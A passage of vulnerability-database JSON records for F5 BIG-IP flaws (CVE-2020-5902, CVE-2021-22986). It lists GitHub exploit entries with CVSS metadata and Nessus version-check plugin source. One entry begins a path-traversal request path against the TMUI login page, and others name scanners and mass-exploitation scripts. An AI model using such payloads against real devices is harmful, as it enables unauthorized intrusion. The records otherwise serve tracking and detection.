"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-06T04:03:58", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-07-27T01:18:39", "id": "697CC4E5-B8C5-57DA-8E6E-C44C37811757", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-21T01:37:02", "description": "# CVE-2020-5902\nAuto exploit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T06:48:20", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-04-20T16:15:53", "id": "A8BE443F-B43C-5460-9DBF-0E7C65078EF2", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:35:34", "description": "# CVE-2020-5902\nPO...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-07T19:07:55", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-09T04:38:49", "id": "66506397-D518-518F-B4A6-3C3F99602E30", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-29T01:00:23", "description": "# CVE-2020-5902-Scanner\nAutomated script for F5 BIG-IP scanner (...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-05T06:19:09", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-07-28T15:19:26", "id": "21D540EC-C4D0-5076-92B2-AA746AF7AEE4", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-27T08:07:54", "description": "# CVE-2020-5902 BIG-IP RCE\n\n![](./CVE-2020-5902.gif)\n\n## Update ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-05T16:38:32", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-07-27T07:12:02", "id": "7F937E02-A1B2-5F78-B140-90BC298729D4", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-27T08:08:35", "description": "# CVE-2020-5902\nexploit code for F5-Big-IP (CVE-2020-5902)\n\n# S...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-06T01:12:23", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-07-27T07:12:03", "id": "2D3AD059-4772-527B-A78C-724AFA1B109F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-26T10:02:50", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-07T11:42:34", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T12:00:28", "id": "9DA6E85F-7AF2-5EE3-BF5C-A430C8DA3C4D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-04T08:17:02", "description": "F5 BIG-IP RCE\uff08CVE-2020-5902\uff09\u6f0f\u6d1e\u68c0\u6d4b\u5de5\u5177\n==\n\n\n# Summary\n\n20200706\uff0c\u7f51\u4e0a\u66dd\u51fa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-10T15:33:00", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-08-04T02:59:22", "id": "431446A1-D76F-5889-BBDD-1C55456A4D73", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-07T02:06:21", "description": "# CVE-2020-5902-POC-EXP\n\n**\u4f7f\u7528\u65b9\u6cd5**\n\n python3 f5_rce.py scan ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-06T09:16:36", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-08-05T10:04:54", "id": "D4572C36-FAE8-5802-9B48-CF143220B909", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:35:31", "description": "# Cve-2020-5029-finder\nIt is a small script to fetch out the s...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-08T10:38:35", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5029", "CVE-2020-5902"], "modified": "2020-07-13T08:20:12", "id": "1348D3BB-7C57-5B0C-9B6B-EE26F534D536", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:49:11", "description": "# CVE-2020-5902\n## RCE\n/tmui/login.jsp/..;/tmui/locallb/workspac...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-25T02:07:41", "type": "githubexploit", "title": "Exploit for Cross-site Scripting in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2020-5903"], "modified": "2020-10-25T06:02:24", "id": "F22160B4-2E80-5B7D-8238-95D7833F6D73", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:55:02", "description": "# CVE-2020-6308-mass-explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-30T03:08:17", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Sap Businessobjects Business Intelligence Platform", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2020-6308"], "modified": "2021-02-08T13:43:16", "id": "350E6199-FA83-5A2F-91D3-19E2D2921801", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "nessus": [{"lastseen": "2022-06-16T14:55:40", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to 12.1.5.3 / 13.1.3.6 / 14.1.4 / 15.1.2.1 / 16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K03009991 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated. (CVE-2021-22986)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : iControl REST unauthenticated remote command execution vulnerability (K03009991)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22986"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL03009991.NASL", "href": "https://www.tenable.com/plugins/nessus/147626", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K03009991.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147626);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\"CVE-2021-22986\");\n script_xref(name:\"IAVA\", value:\"2021-A-0127\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"F5 Networks BIG-IP : iControl REST unauthenticated remote command execution vulnerability (K03009991)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to 12.1.5.3 / 13.1.3.6 / 14.1.4 / 15.1.2.1 /\n16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K03009991 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before\n 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the\n iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software\n versions which have reached End of Software Development (EoSD) are not evaluated. (CVE-2021-22986)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K03009991\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K03009991.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22986\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 iControl REST Unauthenticated SSRF Token Generation RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K03009991';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'AM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'APM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'ASM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'AVR': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'GTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'LC': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'LTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'PEM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T17:16:54", "description": "A remote code execution vulnerability exists in the iControl REST API feature of F5's BIG-IP product. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-24T00:00:00", "type": "nessus", "title": "F5 BIG-IP RCE (CVE-2021-22986)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22986"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/h:f5:big-ip"], "id": "F5_CVE-2021-22986.NBIN", "href": "https://www.tenable.com/plugins/nessus/148022", "sourceData": "Binary data f5_cve-2021-22986.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:55:22", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to 11.6.5.3 / 12.1.5.3 / 13.1.3.6 / 14.1.4 / 15.1.2.1 / 16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K18132488 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, 12.1.x before 12.1.5.3, and 11.6.x before 11.6.5.3 when running in Appliance mode, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has an authenticated remote command execution vulnerability in undisclosed pages. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated. (CVE-2021-22987)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported 